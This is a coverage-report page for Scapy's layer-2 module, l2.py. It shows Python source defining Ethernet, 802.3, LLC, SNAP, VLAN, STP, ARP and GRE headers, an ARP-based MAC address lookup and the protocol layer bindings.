Coverage for /pythoncovmergedfiles/medio/medio/usr/local/lib/python3.11/site-packages/scapy/layers/l2.py: 50%

Shortcuts on this page

r m x   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

518 statements  

1# SPDX-License-Identifier: GPL-2.0-only 

2# This file is part of Scapy 

3# See https://scapy.net/ for more information 

4# Copyright (C) Philippe Biondi <phil@secdev.org> 

5 

6""" 

7Classes and functions for layer 2 protocols. 

8""" 

9 

10import itertools 

11import socket 

12import struct 

13import time 

14 

15from scapy.ansmachine import AnsweringMachine 

16from scapy.arch import get_if_addr, get_if_hwaddr 

17from scapy.base_classes import Gen, Net, _ScopedIP 

18from scapy.compat import chb 

19from scapy.config import conf 

20from scapy import consts 

21from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_METRICOM, \ 

22 DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LINUX_SLL2, \ 

23 DLT_LOOP, DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, ETH_P_MACSEC 

24from scapy.error import ( 

25 ScapyNoDstMacException, 

26 log_runtime, 

27 warning, 

28) 

29from scapy.fields import ( 

30 BCDFloatField, 

31 BitField, 

32 ByteEnumField, 

33 ByteField, 

34 ConditionalField, 

35 FCSField, 

36 FieldLenField, 

37 IP6Field, 

38 IPField, 

39 IntEnumField, 

40 IntField, 

41 LenField, 

42 MACField, 

43 MultipleTypeField, 

44 OUIField, 

45 ShortEnumField, 

46 ShortField, 

47 SourceIP6Field, 

48 SourceIPField, 

49 StrFixedLenField, 

50 StrLenField, 

51 ThreeBytesField, 

52 XByteField, 

53 XIntField, 

54 XShortEnumField, 

55 XShortField, 

56) 

57from scapy.interfaces import _GlobInterfaceType, resolve_iface 

58from scapy.packet import bind_layers, Packet 

59from scapy.plist import ( 

60 PacketList, 

61 QueryAnswer, 

62 SndRcvList, 

63 _PacketList, 

64) 

65from scapy.sendrecv import sendp, srp, srp1, srploop 

66from scapy.utils import ( 

67 checksum, 

68 hexdump, 

69 hexstr, 

70 in4_getnsmac, 

71 in4_ismaddr, 

72 inet_aton, 

73 inet_ntoa, 

74 mac2str, 

75 pretty_list, 

76 valid_mac, 

77 valid_net, 

78 valid_net6, 

79) 

80 

81# Typing imports 

82from typing import ( 

83 Any, 

84 Callable, 

85 Dict, 

86 Iterable, 

87 List, 

88 Optional, 

89 Tuple, 

90 Type, 

91 Union, 

92 cast, 

93) 

94from scapy.interfaces import NetworkInterface 

95 

96 

97if conf.route is None: 

98 # unused import, only to initialize conf.route 

99 import scapy.route # noqa: F401 

100 

101 

# type definitions
# A resolver receives the L2 and L3 packet instances and returns the
# destination address as a string, or None when it cannot be determined.
_ResolverCallable = Callable[[Packet, Packet], Optional[str]]

104 

105################# 

106# Tools # 

107################# 

108 

109 

class Neighbor:
    """
    Registry mapping a (L2 class, L3 class) pair to the callable that
    resolves the default L2 destination address for that pair.
    """

    def __init__(self):
        # type: () -> None
        self.resolvers = {}  # type: Dict[Tuple[Type[Packet], Type[Packet]], _ResolverCallable]  # noqa: E501

    def register_l3(self, l2, l3, resolve_method):
        # type: (Type[Packet], Type[Packet], _ResolverCallable) -> None
        """Associate ``resolve_method`` with the ``(l2, l3)`` class pair."""
        self.resolvers[(l2, l3)] = resolve_method

    def resolve(self, l2inst, l3inst):
        # type: (Packet, Packet) -> Optional[str]
        """
        Call the resolver registered for the exact classes of both
        instances. Returns None when no resolver is registered.
        """
        key = (l2inst.__class__, l3inst.__class__)
        try:
            resolver = self.resolvers[key]
        except KeyError:
            return None
        return resolver(l2inst, l3inst)

    def __repr__(self):
        # type: () -> str
        rows = []
        for l2_cls, l3_cls in self.resolvers:
            rows.append(f"{l2_cls.__name__:<15} -> {l3_cls.__name__:<15}")
        return "\n".join(rows)

129 

130 

# Global resolver registry; layers add their resolvers with register_l3().
conf.neighbor = Neighbor()

# cache entries expire after 120s
_arp_cache = conf.netcache.new_cache("arp_cache", 120)

135 

136 

@conf.commands.register
def getmacbyip(ip, chainCC=0):
    # type: (str, int) -> Optional[str]
    """
    Returns the destination MAC address used to reach a given IP address.

    This will follow the routing table and will issue an ARP request if
    necessary. Special cases (multicast, etc.) are also handled.

    :param ip: the IPv4 address (a Net is reduced to its first address)
    :param chainCC: forwarded as-is to srp1()
    :returns: the MAC address as a string, or None if the ARP request
        failed or went unanswered

    .. seealso:: :func:`~scapy.layers.inet6.getmacbyip6` for IPv6.
    """
    # Sanitize the IP: a Net yields its first address, an empty value
    # becomes 0.0.0.0, and the result is normalised through aton/ntoa.
    if isinstance(ip, Net):
        ip = next(iter(ip))
    ip = inet_ntoa(inet_aton(ip or "0.0.0.0"))

    # Multicast addresses map directly to a MAC address
    if in4_ismaddr(ip):
        return in4_getnsmac(inet_aton(ip))

    # Check the routing table
    iface, _, gateway = conf.route.route(ip)

    # Limited broadcast, loopback interface and directed broadcast all
    # resolve to the broadcast MAC.
    if (
        ip == "255.255.255.255"
        or iface == conf.loopback_name
        or ip in conf.route.get_if_bcast(iface)
    ):
        return "ff:ff:ff:ff:ff:ff"

    # An ARP request is necessary: ask for the gateway when there is one
    next_hop = ip if gateway == "0.0.0.0" else gateway

    # Check the cache
    cached = _arp_cache.get(next_hop)
    if cached:
        return cached

    try:
        reply = srp1(
            Ether(dst=ETHER_BROADCAST) / ARP(op="who-has", pdst=next_hop),
            type=ETH_P_ARP,
            iface=iface,
            timeout=2,
            verbose=0,
            chainCC=chainCC,
            nofilter=1,
        )
    except Exception as ex:
        # Best effort: a failed resolution is reported, not raised
        warning("getmacbyip failed on %s", ex)
        return None
    if reply is None:
        return None
    mac = reply.payload.hwsrc
    _arp_cache[next_hop] = mac
    return mac

194 

195 

196# Fields 

197 

class DestMACField(MACField):
    """
    MAC field with no default value: when left unset, the address is
    resolved through conf.neighbor at build time.
    """

    def __init__(self, name):
        # type: (str) -> None
        MACField.__init__(self, name, None)

    def i2h(self, pkt, x):
        # type: (Optional[Packet], Optional[str]) -> str
        # Unlike i2m(), no neighbor resolution is attempted here: an unset
        # value is handed to MACField unchanged.
        return super().i2h(pkt, x)

    def i2m(self, pkt, x):
        # type: (Optional[Packet], Optional[str]) -> bytes
        """
        Build the machine value, resolving an unset destination first.

        :raises ScapyNoDstMacException: if resolution fails and
            conf.raise_no_dst_mac is set
        """
        if x is not None or pkt is None:
            return super().i2m(pkt, x)
        resolved = None
        try:
            resolved = conf.neighbor.resolve(pkt, pkt.payload)
        except socket.error:
            # Resolution failure is handled by the fallback below
            pass
        if resolved is None:
            if conf.raise_no_dst_mac:
                raise ScapyNoDstMacException()
            resolved = "ff:ff:ff:ff:ff:ff"
            warning(
                "MAC address to reach destination not found. Using broadcast."
            )
        return super().i2m(pkt, resolved)

225 

226 

class SourceMACField(MACField):
    """
    MAC field whose unset value defaults to the MAC address of the
    interface returned by ``getif(pkt)``.
    """
    __slots__ = ["getif"]

    def __init__(self, name, getif=None):
        # type: (str, Optional[Any]) -> None
        MACField.__init__(self, name, None)
        if getif is None:
            # Default: the interface is the first element of pkt.route()
            def getif(pkt):
                return pkt.route()[0]
        self.getif = getif

    def i2h(self, pkt, x):
        # type: (Optional[Packet], Optional[str]) -> str
        if x is None:
            iface = self.getif(pkt)
            x = resolve_iface(iface).mac if iface else None
            if x is None:
                # No interface, or the interface has no MAC address
                x = "00:00:00:00:00:00"
        return super().i2h(pkt, x)

    def i2m(self, pkt, x):
        # type: (Optional[Packet], Optional[Any]) -> bytes
        # Go through i2h() first so the interface default is applied
        human = self.i2h(pkt, x)
        return super().i2m(pkt, human)

248 

249 

250# Layers 

251 

# ARP hardware type number -> description; the numbers are consecutive and
# start at 1, so the table is built from an ordered list.
HARDWARE_TYPES = dict(enumerate(
    [
        "Ethernet (10Mb)",
        "Ethernet (3Mb)",
        "AX.25",
        "Proteon ProNET Token Ring",
        "Chaos",
        "IEEE 802 Networks",
        "ARCNET",
        "Hyperchannel",
        "Lanstar",
        "Autonet Short Address",
        "LocalTalk",
        "LocalNet",
        "Ultra link",
        "SMDS",
        "Frame relay",
        "ATM",
        "HDLC",
        "Fibre Channel",
        "ATM",
        "Serial Line",
        "ATM",
    ],
    start=1,
))

275 

# Name the EtherTypes of the tagging layers handled in this module
ETHER_TYPES[0x88a8] = '802_1AD'
ETHER_TYPES[0x88e7] = '802_1AH'
ETHER_TYPES[ETH_P_MACSEC] = '802_1AE'

279 

280 

class Ether(Packet):
    """Ethernet header: destination MAC, source MAC and EtherType."""
    name = "Ethernet"
    fields_desc = [
        DestMACField("dst"),
        SourceMACField("src"),
        XShortEnumField("type", 0x9000, ETHER_TYPES),
    ]
    __slots__ = ["_defrag_pos"]

    def hashret(self):
        # type: () -> bytes
        type_key = struct.pack("H", self.type)
        return type_key + self.payload.hashret()

    def answers(self, other):
        # type: (Packet) -> int
        # Only an Ether frame with the same type can be answered
        if not isinstance(other, Ether) or self.type != other.type:
            return 0
        return self.payload.answers(other.payload)

    def mysummary(self):
        # type: () -> str
        return self.sprintf("%src% > %dst% (%type%)")

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        # type: (Optional[bytes], *Any, **Any) -> Type[Packet]
        # Bytes 12-13 hold the type/length word: a value <= 1500 is a
        # length, so the frame is dissected as Dot3 instead.
        if _pkt and len(_pkt) >= 14:
            (type_or_len,) = struct.unpack("!H", _pkt[12:14])
            if type_or_len <= 1500:
                return Dot3
        return cls

310 

311 

class Dot3(Packet):
    """802.3 header: destination MAC, source MAC and payload length."""
    name = "802.3"
    fields_desc = [
        DestMACField("dst"),
        SourceMACField("src"),
        LenField("len", None, "H"),
    ]

    def extract_padding(self, s):
        # type: (bytes) -> Tuple[bytes, bytes]
        # The first ``len`` bytes are payload, the remainder is padding
        cut = self.len
        payload, padding = s[:cut], s[cut:]
        return payload, padding

    def answers(self, other):
        # type: (Packet) -> int
        if not isinstance(other, Dot3):
            return 0
        return self.payload.answers(other.payload)

    def mysummary(self):
        # type: () -> str
        return f"802.3 {self.src} > {self.dst}"

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        # type: (Optional[Any], *Any, **Any) -> Type[Packet]
        # Bytes 12-13 hold the type/length word: a value > 1500 is an
        # EtherType, so the frame is dissected as Ether instead.
        if _pkt and len(_pkt) >= 14:
            (type_or_len,) = struct.unpack("!H", _pkt[12:14])
            if type_or_len > 1500:
                return Ether
        return cls

340 

341 

class LLC(Packet):
    """LLC header: DSAP, SSAP and a one-byte control field."""
    name = "LLC"
    fields_desc = [
        XByteField("dsap", 0x00),
        XByteField("ssap", 0x00),
        ByteField("ctrl", 0),
    ]

347 

348 

def l2_register_l3(l2: Packet, l3: Packet) -> Optional[str]:
    """
    Resolve the default L2 destination address by looking one layer deeper:
    the lookup is repeated with the payload of ``l3`` in place of ``l3``.

    :returns: whatever the resolver registered for (l2, payload of l3)
        returns, or None when there is none.
    """
    return conf.neighbor.resolve(l2, l3.payload)

355 

356 

# LLC defers destination resolution to its payload
conf.neighbor.register_l3(Ether, LLC, l2_register_l3)
conf.neighbor.register_l3(Dot3, LLC, l2_register_l3)

359 

360 

# Values of the "pkttype" field of the cooked Linux headers, indexed from 0
COOKED_LINUX_PACKET_TYPES = dict(enumerate([
    "unicast",
    "broadcast",
    "multicast",
    "unicast-to-another-host",
    "sent-by-us",
]))

368 

369 

class CookedLinux(Packet):
    """Linux cooked capture header (DLT_LINUX_SLL)."""
    # Documentation: http://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL.html
    name = "cooked linux"
    # from wireshark's database
    fields_desc = [
        ShortEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES),
        XShortField("lladdrtype", 512),
        ShortField("lladdrlen", 0),
        StrFixedLenField("src", b"", 8),
        XShortEnumField("proto", 0x800, ETHER_TYPES),
    ]

379 

380 

class CookedLinuxV2(CookedLinux):
    """Linux cooked capture header, version 2 (DLT_LINUX_SLL2)."""
    # Documentation: https://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL2.html
    name = "cooked linux v2"
    fields_desc = [
        XShortEnumField("proto", 0x800, ETHER_TYPES),
        ShortField("reserved", 0),
        IntField("ifindex", 0),
        XShortField("lladdrtype", 512),
        ByteEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES),
        ByteField("lladdrlen", 0),
        StrFixedLenField("src", b"", 8),
    ]

391 

392 

class MPacketPreamble(Packet):
    """8-byte mPacket preamble, with a 32-bit FCS field."""
    # IEEE 802.3br Figure 99-3
    name = "MPacket Preamble"
    fields_desc = [
        StrFixedLenField("preamble", b"", length=8),
        FCSField("fcs", 0, fmt="!I"),
    ]

398 

399 

class SNAP(Packet):
    """SNAP header: an OUI followed by a protocol code."""
    name = "SNAP"
    fields_desc = [
        OUIField("OUI", 0x000000),
        XShortEnumField("code", 0x000, ETHER_TYPES),
    ]

404 

405 

# SNAP defers destination resolution to its payload
conf.neighbor.register_l3(Dot3, SNAP, l2_register_l3)

407 

408 

class Dot1Q(Packet):
    """802.1Q tag: priority, DEI, VLAN id and the encapsulated type."""
    name = "802.1Q"
    aliastypes = [Ether]
    fields_desc = [
        BitField("prio", 0, 3),
        BitField("dei", 0, 1),
        BitField("vlan", 1, 12),
        XShortEnumField("type", 0x0000, ETHER_TYPES),
    ]
    deprecated_fields = {
        "id": ("dei", "2.5.0"),
    }

    def answers(self, other):
        # type: (Packet) -> int
        if not isinstance(other, Dot1Q):
            # The query carried no tag: compare our payload with it directly
            return self.payload.answers(other)
        if self.type == other.type and self.vlan == other.vlan:
            return self.payload.answers(other.payload)
        return 0

    def default_payload_class(self, pay):
        # type: (bytes) -> Type[Packet]
        # A "type" value <= 1500 is a length: the payload is then LLC
        return LLC if self.type <= 1500 else conf.raw_layer

    def extract_padding(self, s):
        # type: (bytes) -> Tuple[bytes, Optional[bytes]]
        if self.type > 1500:
            return s, None
        # "type" is a length here: split payload from padding on it
        length = self.type
        return s[:length], s[length:]

    def mysummary(self):
        # type: () -> str
        parent = self.underlayer
        if isinstance(parent, Ether):
            return parent.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%")  # noqa: E501
        return self.sprintf("802.1q (%Dot1Q.type%) vlan %Dot1Q.vlan%")

448 

449 

# Dot1Q defers destination resolution to its payload
conf.neighbor.register_l3(Ether, Dot1Q, l2_register_l3)

451 

452 

class STP(Packet):
    """Spanning Tree Protocol BPDU."""
    name = "Spanning Tree Protocol"
    fields_desc = [
        ShortField("proto", 0),
        ByteField("version", 0),
        ByteField("bpdutype", 0),
        ByteField("bpduflags", 0),
        # Root bridge
        ShortField("rootid", 0),
        MACField("rootmac", ETHER_ANY),
        IntField("pathcost", 0),
        # Sending bridge and port
        ShortField("bridgeid", 0),
        MACField("bridgemac", ETHER_ANY),
        ShortField("portid", 0),
        # Timers
        BCDFloatField("age", 1),
        BCDFloatField("maxage", 20),
        BCDFloatField("hellotime", 2),
        BCDFloatField("fwddelay", 15),
    ]

469 

470 

class ARP(Packet):
    """
    ARP packet.

    The four address fields are MultipleTypeFields. Each typed variant
    carries a pair of conditions (the first taking only the packet, the
    second the packet and the value being set); the StrFixedLenField
    sized by hwlen / plen is the fallback.
    """
    name = "ARP"
    fields_desc = [
        XShortEnumField("hwtype", 0x0001, HARDWARE_TYPES),
        XShortEnumField("ptype", 0x0800, ETHER_TYPES),
        FieldLenField("hwlen", None, fmt="B", length_of="hwsrc"),
        FieldLenField("plen", None, fmt="B", length_of="psrc"),
        ShortEnumField("op", 1, {
            "who-has": 1,
            "is-at": 2,
            "RARP-req": 3,
            "RARP-rep": 4,
            "Dyn-RARP-req": 5,
            "Dyn-RAR-rep": 6,
            "Dyn-RARP-err": 7,
            "InARP-req": 8,
            "InARP-rep": 9
        }),
        # Sender hardware address
        MultipleTypeField(
            [
                (SourceMACField("hwsrc"),
                 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6,
                  lambda pkt, val: pkt.hwtype == 1 and (
                      pkt.hwlen == 6 or (pkt.hwlen is None and
                                         (val is None or len(val) == 6 or
                                          valid_mac(val)))
                  ))),
            ],
            StrFixedLenField("hwsrc", None, length_from=lambda pkt: pkt.hwlen),
        ),
        # Sender protocol address
        MultipleTypeField(
            [
                (SourceIPField("psrc"),
                 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4,
                  lambda pkt, val: pkt.ptype == 0x0800 and (
                      pkt.plen == 4 or (pkt.plen is None and
                                        (val is None or valid_net(val)))
                  ))),
                (SourceIP6Field("psrc"),
                 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16,
                  lambda pkt, val: pkt.ptype == 0x86dd and (
                      pkt.plen == 16 or (pkt.plen is None and
                                         (val is None or valid_net6(val)))
                  ))),
            ],
            StrFixedLenField("psrc", None, length_from=lambda pkt: pkt.plen),
        ),
        # Target hardware address
        MultipleTypeField(
            [
                (MACField("hwdst", ETHER_ANY),
                 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6,
                  lambda pkt, val: pkt.hwtype == 1 and (
                      pkt.hwlen == 6 or (pkt.hwlen is None and
                                         (val is None or len(val) == 6 or
                                          valid_mac(val)))
                  ))),
            ],
            StrFixedLenField("hwdst", None, length_from=lambda pkt: pkt.hwlen),
        ),
        # Target protocol address
        MultipleTypeField(
            [
                (IPField("pdst", "0.0.0.0"),
                 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4,
                  lambda pkt, val: pkt.ptype == 0x0800 and (
                      pkt.plen == 4 or (pkt.plen is None and
                                        (val is None or valid_net(val)))
                  ))),
                (IP6Field("pdst", "::"),
                 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16,
                  lambda pkt, val: pkt.ptype == 0x86dd and (
                      pkt.plen == 16 or (pkt.plen is None and
                                         (val is None or valid_net6(val)))
                  ))),
            ],
            StrFixedLenField("pdst", None, length_from=lambda pkt: pkt.plen),
        ),
    ]

    def hashret(self):
        # type: () -> bytes
        # (op + 1) // 2 gives a request (odd op) and the reply that follows
        # it (op + 1) the same hash.
        op_pair = (self.op + 1) // 2
        own = struct.pack(">HHH", self.hwtype, self.ptype, op_pair)
        return own + self.payload.hashret()

    def answers(self, other):
        # type: (Packet) -> int
        if not isinstance(other, ARP) or self.op != other.op + 1:
            return False
        # We use a loose comparison on psrc vs pdst to catch answers
        # with ARP leaks
        mine = self.get_field('psrc').i2m(self, self.psrc)  # type: bytes
        theirs = other.get_field('pdst').i2m(other, other.pdst)  # type: bytes
        return mine[:len(theirs)] == theirs[:len(mine)]

    def route(self):
        # type: () -> Tuple[Optional[str], Optional[str], Optional[str]]
        """
        Route the packet according to its ``pdst`` field, using the IPv4
        or IPv6 routing table depending on the field type in use.
        Returns (None, None, None) when pdst is neither.
        """
        multi_fld, dst = cast(Tuple[MultipleTypeField, str],
                              self.getfield_and_val("pdst"))
        active_fld, dst = multi_fld._find_fld_pkt_val(self, dst)
        scope = dst.scope if isinstance(dst, (Net, _ScopedIP)) else None
        if isinstance(dst, Gen):
            # Route on the first address of a generator
            dst = next(iter(dst))
        if isinstance(active_fld, IP6Field):
            return conf.route6.route(dst, dev=scope)
        if isinstance(active_fld, IPField):
            return conf.route.route(dst, dev=scope)
        return None, None, None

    def extract_padding(self, s):
        # type: (bytes) -> Tuple[bytes, bytes]
        # ARP has no payload: everything that follows is padding
        return b"", s

    def mysummary(self):
        # type: () -> str
        by_op = {
            1: "ARP who has %pdst% says %psrc%",
            2: "ARP is at %hwsrc% says %psrc%",
        }
        return self.sprintf(by_op.get(self.op, "ARP %op% %psrc% > %pdst%"))

595 

596 

def l2_register_l3_arp(l2: Packet, l3: Packet) -> Optional[str]:
    """
    Resolves the default L2 destination address when ARP is used.

    - who-has (op 1): the broadcast address is used.
    - anything else: the MAC address of ``pdst`` is looked up, through
      getmacbyip() for a 4-byte address or getmacbyip6() for a 16-byte one.
      An is-at (op 2) additionally logs a warning first.

    :returns: the destination MAC, or None if pdst is neither 4 nor 16
        bytes long (a warning is logged) or if the lookup itself fails.
    """
    if l3.op == 1:  # who-has
        return "ff:ff:ff:ff:ff:ff"
    elif l3.op == 2:  # is-at
        log_runtime.warning(
            "You should be providing the Ethernet destination MAC address when "
            "sending an is-at ARP."
        )
    # The destination is unknown: it has to be resolved from pdst, which may
    # itself trigger a neighbor lookup.
    plen = l3.get_field("pdst").i2len(l3, l3.pdst)
    if plen == 4:
        return getmacbyip(l3.pdst)
    elif plen == 16:
        # i2len() is in bytes: an IPv6 address is 16 bytes long (the ARP
        # field conditions also use plen == 16 for 0x86dd).
        from scapy.layers.inet6 import getmacbyip6
        return getmacbyip6(l3.pdst)
    # Can't even do that
    log_runtime.warning(
        "You should be providing the Ethernet destination mac when sending this "
        "kind of ARP packets."
    )
    return None

621 

622 

# Ether/ARP: the destination depends on the ARP operation and on pdst
conf.neighbor.register_l3(Ether, ARP, l2_register_l3_arp)

624 

625 

class GRErouting(Packet):
    """GRE routing entry: address family, SRE offset/length and the data."""
    name = "GRE routing information"
    fields_desc = [
        ShortField("address_family", 0),
        ByteField("SRE_offset", 0),
        # SRE_len is computed from routing_info when left unset
        FieldLenField("SRE_len", None, "routing_info", "B"),
        StrLenField("routing_info", b"",
                    length_from=lambda pkt: pkt.SRE_len),
    ]

634 

635 

class GRE(Packet):
    """
    GRE header.

    The ``chksum``/``offset``, ``key`` and ``sequence_number`` fields are
    only present when the matching ``*_present`` flag is set.
    """
    name = "GRE"
    deprecated_fields = {
        "seqence_number": ("sequence_number", "2.4.4"),
    }
    fields_desc = [BitField("chksum_present", 0, 1),
                   BitField("routing_present", 0, 1),
                   BitField("key_present", 0, 1),
                   BitField("seqnum_present", 0, 1),
                   BitField("strict_route_source", 0, 1),
                   BitField("recursion_control", 0, 3),
                   BitField("flags", 0, 5),
                   BitField("version", 0, 3),
                   XShortEnumField("proto", 0x0000, ETHER_TYPES),
                   ConditionalField(XShortField("chksum", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1),  # noqa: E501
                   ConditionalField(XShortField("offset", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1),  # noqa: E501
                   ConditionalField(XIntField("key", None), lambda pkt:pkt.key_present == 1),  # noqa: E501
                   ConditionalField(XIntField("sequence_number", None), lambda pkt:pkt.seqnum_present == 1),  # noqa: E501
                   ]

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        # type: (Optional[Any], *Any, **Any) -> Type[Packet]
        """Dissect as GRE_PPTP when the protocol word (bytes 2-3) is 0x880b."""
        # The length guard keeps struct.unpack from raising on input
        # shorter than 4 bytes; such input is dissected as plain GRE.
        if (_pkt and len(_pkt) >= 4 and
                struct.unpack("!H", _pkt[2:4])[0] == 0x880b):
            return GRE_PPTP
        return cls

    def post_build(self, p, pay):
        # type: (bytes, bytes) -> bytes
        """Append the payload and fill in the checksum if it was left unset."""
        p += pay
        if self.chksum_present and self.chksum is None:
            # The checksum covers header and payload; it is written to
            # bytes 4-5, right after the flags and protocol words.
            c = checksum(p)
            p = p[:4] + chb((c >> 8) & 0xff) + chb(c & 0xff) + p[6:]
        return p

670 

671 

class GRE_PPTP(GRE):

    """
    Enhanced GRE header used with PPTP
    RFC 2637
    """

    name = "GRE PPTP"
    deprecated_fields = {
        "seqence_number": ("sequence_number", "2.4.4"),
    }
    fields_desc = [
        BitField("chksum_present", 0, 1),
        BitField("routing_present", 0, 1),
        BitField("key_present", 1, 1),
        BitField("seqnum_present", 0, 1),
        BitField("strict_route_source", 0, 1),
        BitField("recursion_control", 0, 3),
        BitField("acknum_present", 0, 1),
        BitField("flags", 0, 4),
        BitField("version", 1, 3),
        XShortEnumField("proto", 0x880b, ETHER_TYPES),
        ShortField("payload_len", None),
        ShortField("call_id", None),
        ConditionalField(XIntField("sequence_number", None), lambda pkt: pkt.seqnum_present == 1),  # noqa: E501
        ConditionalField(XIntField("ack_number", None), lambda pkt: pkt.acknum_present == 1),  # noqa: E501
    ]

    def post_build(self, p, pay):
        # type: (bytes, bytes) -> bytes
        built = p + pay
        if self.payload_len is not None:
            return built
        # payload_len was left unset: write the payload size, truncated to
        # 16 bits, big-endian into bytes 4-5.
        size = struct.pack("!H", len(pay) & 0xffff)
        return built[:4] + size + built[6:]

705 

706 

707# *BSD loopback layer 

708 

class LoIntEnumField(IntEnumField):
    """IntEnumField whose machine value is the value shifted left by 24 bits."""

    def m2i(self, pkt, x):
        # type: (Optional[Packet], int) -> int
        # machine -> internal: drop the 24 low bits
        return x >> 24

    def i2m(self, pkt, x):
        # type: (Optional[Packet], Union[List[int], int, None]) -> int
        # internal -> machine: move the value above the 24 low bits
        value = cast(int, x)
        return value << 24

718 

719 

720# https://github.com/wireshark/wireshark/blob/fe219637a6748130266a0b0278166046e60a2d68/epan/dissectors/packet-null.c 

721# https://www.wireshark.org/docs/wsar_html/epan/aftypes_8h.html 

LOOPBACK_TYPES = {
    0x2: "IPv4",
    0x7: "OSI",
    0x10: "Appletalk",
    0x17: "Netware IPX/SPX",
}
# Three different type values all denote IPv6
LOOPBACK_TYPES.update(dict.fromkeys((0x18, 0x1c, 0x1e), "IPv6"))

727 

728 

729# On OpenBSD, Loopback = LoopbackOpenBSD. On other platforms, the 2 are available. 

730# This is to be compatible with both tcpdump and tshark 

731 

class Loopback(Packet):
    r"""
    \*BSD loopback layer
    """
    __slots__ = ["_defrag_pos"]
    name = "Loopback"
    # On OpenBSD the type is a plain IntEnumField; elsewhere the shifted
    # LoIntEnumField variant is used.
    fields_desc = [
        (IntEnumField if consts.OPENBSD else LoIntEnumField)(
            "type", 0x2, LOOPBACK_TYPES
        )
    ]

742 

743 

if not consts.OPENBSD:
    class LoopbackOpenBSD(Loopback):
        """Loopback variant that always uses a plain IntEnumField type."""
        name = "OpenBSD Loopback"
        fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)]
else:
    # On OpenBSD, Loopback already has that layout: reuse it
    LoopbackOpenBSD = Loopback

750 

751 

class Dot1AD(Dot1Q):
    """802.1ad tag: same fields and behaviour as Dot1Q, under another name."""
    name = '802_1AD'

754 

755 

class Dot1AH(Packet):
    """802.1ah tag: priority, DEI, NCA, reserved bits and a 3-byte I-SID."""
    name = "802_1AH"
    fields_desc = [BitField("prio", 0, 3),
                   BitField("dei", 0, 1),
                   BitField("nca", 0, 1),
                   BitField("res1", 0, 1),
                   BitField("res2", 0, 2),
                   ThreeBytesField("isid", 0)]

    def answers(self, other):
        # type: (Packet) -> int
        # Only a Dot1AH with the same I-SID can be answered
        if isinstance(other, Dot1AH):
            if self.isid == other.isid:
                return self.payload.answers(other.payload)
        return 0

    def mysummary(self):
        # type: () -> str
        # The closing parenthesis was missing from the summary
        return self.sprintf("802.1ah (isid=%Dot1AH.isid%)")

775 

776 

# Dot1AH defers destination resolution to its payload
conf.neighbor.register_l3(Ether, Dot1AH, l2_register_l3)

778 

779 

# Layer bindings. The keyword arguments must name fields of the LOWER
# layer: Ether and Dot1Q/Dot1AD use "type", CookedLinux and GRE use "proto",
# SNAP uses "code".
bind_layers(Dot3, LLC)
bind_layers(Ether, LLC, type=122)
bind_layers(Ether, LLC, type=34928)
bind_layers(Ether, Dot1Q, type=33024)
bind_layers(Ether, Dot1AD, type=0x88a8)
bind_layers(Ether, Dot1AH, type=0x88e7)
bind_layers(Dot1AD, Dot1AD, type=0x88a8)
bind_layers(Dot1AD, Dot1Q, type=0x8100)
bind_layers(Dot1AD, Dot1AH, type=0x88e7)
bind_layers(Dot1Q, Dot1AD, type=0x88a8)
bind_layers(Dot1Q, Dot1AH, type=0x88e7)
bind_layers(Dot1AH, Ether)
bind_layers(Ether, Ether, type=1)
bind_layers(Ether, ARP, type=2054)
bind_layers(CookedLinux, LLC, proto=122)
bind_layers(CookedLinux, Dot1Q, proto=33024)
# CookedLinux has no "type" field: these two were bound on a non-existent
# field and could never match.
bind_layers(CookedLinux, Dot1AD, proto=0x88a8)
bind_layers(CookedLinux, Dot1AH, proto=0x88e7)
bind_layers(CookedLinux, Ether, proto=1)
bind_layers(CookedLinux, ARP, proto=2054)
bind_layers(MPacketPreamble, Ether)
bind_layers(GRE, LLC, proto=122)
bind_layers(GRE, Dot1Q, proto=33024)
# Same correction for GRE, whose protocol field is "proto"
bind_layers(GRE, Dot1AD, proto=0x88a8)
bind_layers(GRE, Dot1AH, proto=0x88e7)
bind_layers(GRE, Ether, proto=0x6558)
bind_layers(GRE, ARP, proto=2054)
bind_layers(GRE, GRErouting, {"routing_present": 1})
bind_layers(GRErouting, conf.raw_layer, {"address_family": 0, "SRE_len": 0})
bind_layers(GRErouting, GRErouting)
bind_layers(LLC, STP, dsap=66, ssap=66, ctrl=3)
bind_layers(LLC, SNAP, dsap=170, ssap=170, ctrl=3)
bind_layers(SNAP, Dot1Q, code=33024)
# Same correction for SNAP, whose protocol field is "code"
bind_layers(SNAP, Dot1AD, code=0x88a8)
bind_layers(SNAP, Dot1AH, code=0x88e7)
bind_layers(SNAP, Ether, code=1)
bind_layers(SNAP, ARP, code=2054)
bind_layers(SNAP, STP, code=267)

818 

# Link-type registrations: register() maps both ways, register_num2layer()
# only number -> layer and register_layer2num() only layer -> number.
conf.l2types.register(ARPHDR_ETHER, Ether)
conf.l2types.register_num2layer(ARPHDR_METRICOM, Ether)
conf.l2types.register_num2layer(ARPHDR_LOOPBACK, Ether)
conf.l2types.register_layer2num(ARPHDR_ETHER, Dot3)
conf.l2types.register(DLT_LINUX_SLL, CookedLinux)
conf.l2types.register(DLT_LINUX_SLL2, CookedLinuxV2)
conf.l2types.register(DLT_ETHERNET_MPACKET, MPacketPreamble)
